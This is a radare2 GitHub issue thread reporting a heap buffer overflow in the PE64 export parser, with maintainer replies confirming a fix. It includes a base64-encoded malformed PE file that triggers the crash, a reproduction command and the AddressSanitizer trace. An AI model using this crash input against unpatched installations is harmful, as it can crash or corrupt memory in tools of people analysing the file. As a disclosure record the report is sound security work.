### ISSUE TITLE
Heap Buffer Overflow in Pe64_r_bin_pe_get_exports()

### ISSUE THREAD

**Issue by fumfel** [radare/radare2#6102]
**Heap Buffer Overflow in Pe64_r_bin_pe_get_exports()**

Tested on latest Git HEAD: 9d1f080b59871414ccca6780609e7f1b00d9be81

To reproduce: `r2 -A r2_hbo_pe`

Payload in base64 (I have a problem with file upload to GH - Save this to .txt file, and decode in terminal: cat payload.txt | base64 -d > r2_hbo_pe):

```
TVowMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAMDAw
MDAw8AAAADAwMDAwtDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwUEUwMDAwBgAwMDAwMDAwMDAwMDAwMDAwCwIwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCYAAAA=
```

ASAN Output

```
==2085==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc27d6ed310 at pc 0x7fc286b59e82 bp 0x7ffe37f228f0 sp 0x7ffe37f228e8
WRITE of size 8 at 0x7fc27d6ed310 thread T0
    #0 0x7fc286b59e81 in Pe64_r_bin_pe_get_exports /home/kamil/Downloads/radare2/libr/..//libr/bin/p/../format/pe/pe.c:1893:21
    #1 0x7fc286b534d3 in symbols /home/kamil/Downloads/radare2/libr/..//libr/bin/p/bin_pe.c:213:17
    #2 0x7fc286a8cd7c in r_bin_object_set_items /home/kamil/Downloads/radare2/libr/bin/bin.c:563:17
    #3 0x7fc286a87cb0 in r_bin_object_new /home/kamil/Downloads/radare2/libr/bin/bin.c:1148:2
    #4 0x7fc286a84984 in r_bin_file_new_from_bytes /home/kamil/Downloads/radare2/libr/bin/bin.c:1285:6
    #5 0x7fc286a8424a in r_bin_load_io_at_offset_as_sz /home/kamil/Downloads/radare2/libr/bin/bin.c:878:13
    #6 0x7fc286a82cc6 in r_bin_load_io_at_offset_as /home/kamil/Downloads/radare2/libr/bin/bin.c:892:12
    #7 0x7fc286a82ba7 in r_bin_load_io /home/kamil/Downloads/radare2/libr/bin/bin.c:732:9
    #8 0x7fc28798ef88 in r_core_file_do_load_for_io_plugin /home/kamil/Downloads/radare2/libr/core/file.c:400:8
    #9 0x7fc28798d25f in r_core_bin_load /home/kamil/Downloads/radare2/libr/core/file.c:520:4
    #10 0x55f7d4bd6be7 in main /home/kamil/Downloads/radare2/binr/radare2/radare2.c:793:14
    #11 0x7fc28137b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x55f7d4b09b68 in _start (/usr/local/bin/radare2+0x20b68)

ASAN:DEADLYSIGNAL
AddressSanitizer: nested bug in the same thread, aborting.
```

**Comment by Maijin** [comment]
Please drag and drop the binary in a zip archive instead of that or rename your executable in .jpg.

**Comment by fumfel** [comment]
[Payload in .zip](https://github.com/radare/radare2/files/568878/r2_hbo1_pe.zip)

**Comment by radare** [comment]
Thats a nice catch. i have it fixed here inlocal, will cleanup the fix and push it with a test for r2r.

thanks!

**Comment by fumfel** [comment]
Great :+1:

**Comment by radare** [comment]
Fixed in 8db20a28f7a3038b426e32b7b4203e3697b556e2
